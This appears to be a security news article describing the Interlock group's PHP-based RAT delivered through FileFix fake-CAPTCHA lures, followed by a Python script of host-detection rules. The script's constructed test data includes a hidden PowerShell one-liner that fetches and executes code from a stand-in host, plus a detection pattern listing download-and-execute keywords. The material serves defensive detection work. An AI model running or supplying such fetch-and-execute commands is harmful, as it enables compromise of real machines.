Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

The Interlock Ransomware Group Unveils a New PHP-Based RAT via FileFix: A Sophisticated Attack Vector



The Interlock ransomware group has unveiled a new PHP-based Remote Access Trojan (RAT) via FileFix, marking a significant shift in their tactics. The malware spreads through compromised websites using fake CAPTCHA checks and exploits Windows File Explorer's address bar to trick users into executing commands. This development highlights the continued evolution of the Interlock group's tooling and their operational sophistication.

  • The Interlock ransomware group has deployed a new PHP-based Remote Access Trojan (RAT) via the FileFix delivery mechanism.
  • Building the RAT in PHP, a web scripting language, departs from the group's earlier Node.js variant and marks a notable shift in its tooling.
  • The RAT spreads via compromised websites using hidden scripts that prompt victims through fake CAPTCHA checks to run a PowerShell script.
  • The PHP version executes through PowerShell, which launches a PHP binary from an unusual path with a custom config file.
  • The malware performs system reconnaissance, checks its privilege level (USER, ADMIN, or SYSTEM), and exfiltrates system information as JSON.
  • The RAT's command and control channel uses trycloudflare.com URLs, abusing the legitimate Cloudflare Tunnel service to hide the true C2 location, with hardcoded fallback IP addresses in reserve.
  • Supported commands include downloading and running executables or DLLs, executing arbitrary shell commands, establishing persistence via registry keys, and shutting itself down.



  • The Interlock ransomware group, known for targeted attacks across a range of industries, has deployed a new PHP-based Remote Access Trojan (RAT) via the FileFix delivery mechanism. The move to PHP, a web scripting language, marks a notable change in the tooling the group uses to gain and maintain access to victim networks.

    According to researchers from the DFIR Report, in partnership with Proofpoint, the Interlock RAT uses a delivery method known as FileFix, a variant of ClickFix, to target multiple industries. The malware spreads via compromised websites using hidden scripts that prompt victims through fake CAPTCHA checks to run a PowerShell script. Both PHP and Node.js variants have been seen, with the PHP version emerging in June.

    The campaign begins with compromised websites injected with a single-line script hidden in the page's HTML, often without the knowledge of site owners or visitors. The linked JavaScript applies heavy IP filtering before serving the payload: the visitor is first asked to click a CAPTCHA to "Verify you are human", then shown "Verification steps" that instruct them to open a Windows input field (the File Explorer address bar in the FileFix variant, the Run dialog in classic ClickFix) and paste in what the page has placed on the clipboard. Pasting and confirming runs a PowerShell script that eventually leads to the Interlock RAT. No browser exploit is involved; the victim performs the execution step themselves.

    FileFix, an evolution of ClickFix, abuses Windows File Explorer's address bar, which accepts and executes commands typed or pasted into it, to get the victim to run the command. In the PHP variant the resulting PowerShell command launches a PHP binary from an unusual path with a custom config file. Once running, the Interlock RAT performs system reconnaissance, checks its privilege level (USER, ADMIN, or SYSTEM), and exfiltrates system information in JSON format.

    It then connects to a remote server to download and execute EXE or DLL files. The malware conducts automated system profiling using various PowerShell commands, collecting detailed information about the system, processes, services, drives, and network. It also performs hands-on-keyboard discovery, such as querying Active Directory, user accounts, and domain controllers, showing signs of attacker interaction.

    The researchers observed the RAT establishing its command and control (C2) channel over trycloudflare.com URLs, abusing the legitimate Cloudflare Tunnel service so that the true location of the C2 server sits behind Cloudflare's infrastructure. Because trycloudflare.com subdomains are free to create and are also used for legitimate purposes, the domain on its own is a weak indicator; it becomes a strong one when correlated with an unusual php.exe process initiating the connection.

    The malware also contains hardcoded fallback IP addresses, so communication can continue even if the Cloudflare Tunnel is disrupted. Interlock RAT supports commands to download and run executables or DLLs, execute arbitrary shell commands, set up persistence via registry keys, and shut itself down. The malicious code also supports lateral movement via RDP.
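    The delivery chain (File Explorer spawning PowerShell, PowerShell launching php.exe from an unusual path with its own config file) and the C2 behaviour (php.exe talking to a trycloudflare.com tunnel or falling back to a hardcoded IP) translate directly into host-based detection logic. The Python below is an added example, not code from the DFIR Report, Proofpoint, or this article: it runs three rules over constructed Sysmon-style process-creation and network-connection records. The expected PHP install directories, the command-line keyword list, and every event record (including the 203.0.113.7 documentation address) are assumptions made for illustration, not indicators from the report.

```python
import ipaddress
import ntpath
import re

# Assumption: directories where a sanctioned PHP CLI would live on a Windows
# host. Adjust per environment; the report does not specify these.
EXPECTED_PHP_DIRS = ("c:\\php\\", "c:\\program files\\", "c:\\xampp\\php\\")

# Command-line fragments typical of ClickFix/FileFix one-liners (hidden window,
# remote fetch, in-memory execution). Assumed heuristics, not report IOCs.
SUSPICIOUS_SHELL = re.compile(
    r"(-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring|"
    r"\biwr\b|invoke-webrequest|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Constructed Sysmon-style process-creation records (Event ID 1 fields only).
PROCESS_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://lure.invalid/v | iex"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "cmdline": r"C:\Users\alice\AppData\Roaming\php\php.exe -c "
                r"C:\Users\alice\AppData\Roaming\php\cfg.ini "
                r"C:\Users\alice\AppData\Roaming\php\main.php"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": '"C:\\Program Files\\Notepad++\\notepad++.exe" notes.txt'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\php\php.exe",
     "cmdline": r"C:\php\php.exe C:\inetpub\site\cron.php"},
]

# Constructed Sysmon-style network-connection records (Event ID 3 fields only).
NETWORK_EVENTS = [
    {"image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "dest_host": "quiet-river-nine.trycloudflare.com", "dest_port": 443},
    {"image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "dest_host": "203.0.113.7", "dest_port": 443},
    {"image": r"C:\php\php.exe",
     "dest_host": "api.partner.example", "dest_port": 443},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "demo.trycloudflare.com", "dest_port": 443},
]


def _base(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def rule_explorer_spawns_shell(ev):
    """Explorer (File Explorer address bar or Run dialog) spawning a shell
    whose command line looks like a paste-and-run one-liner."""
    return (_base(ev["parent"]) == "explorer.exe"
            and _base(ev["image"]) in SHELLS
            and SUSPICIOUS_SHELL.search(ev["cmdline"]) is not None)


def rule_php_unusual_path(ev):
    """php.exe started by a shell from outside the expected install
    directories, or pointed at its own ini file via the PHP CLI's -c flag."""
    if _base(ev["image"]) != "php.exe":
        return False
    image_dir = ntpath.dirname(ev["image"]).lower() + "\\"
    in_expected = any(image_dir.startswith(d) for d in EXPECTED_PHP_DIRS)
    custom_ini = re.search(r"(^|\s)-c\s+\S+", ev["cmdline"]) is not None
    shell_parent = _base(ev["parent"]) in SHELLS
    return shell_parent and (not in_expected or custom_ini)


def rule_php_c2(ev):
    """php.exe connecting to a trycloudflare.com tunnel or straight to a
    literal IP (the hardcoded-fallback behaviour described above)."""
    if _base(ev["image"]) != "php.exe":
        return False
    host = ev["dest_host"].lower().rstrip(".")
    return (host == "trycloudflare.com"
            or host.endswith(".trycloudflare.com")
            or _is_ip(host))


def evaluate(process_events, network_events):
    """Return (rule name, detail) for every record a rule fires on."""
    hits = []
    for ev in process_events:
        for rule in (rule_explorer_spawns_shell, rule_php_unusual_path):
            if rule(ev):
                hits.append((rule.__name__, ev["image"]))
    for ev in network_events:
        if rule_php_c2(ev):
            hits.append(("rule_php_c2", ev["dest_host"]))
    return hits


if __name__ == "__main__":
    for name, detail in evaluate(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{name}: {detail}")
```

    On the constructed records the explorer-to-PowerShell rule, the unusual-path php.exe rule, and both php.exe network rules fire, while the GUI-launched editor, the scheduled PHP job from C:\php, and the browser visiting a trycloudflare.com site stay quiet. The C2 rule is deliberately scoped to php.exe rather than to any trycloudflare.com lookup, which keeps it from paging on developers using quick tunnels; widen it to all processes only if that traffic is rare in your environment.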

    This discovery highlights the continued evolution of the Interlock group's tooling and operational sophistication. Where the earlier Interlock RAT variant was written in Node.js, this one is written in PHP, a common web scripting language, and uses it to gain and maintain access to victim networks.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-Interlock-Ransomware-Group-Unveils-a-New-PHP-Based-RAT-via-FileFix-A-Sophisticated-Attack-Vector-ehn.shtml

  • https://securityaffairs.com/179919/cyber-crime/interlock-ransomware-group-deploys-new-php-based-rat-via-filefix.html


  • Published: Mon Jul 14 14:26:25 2025 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.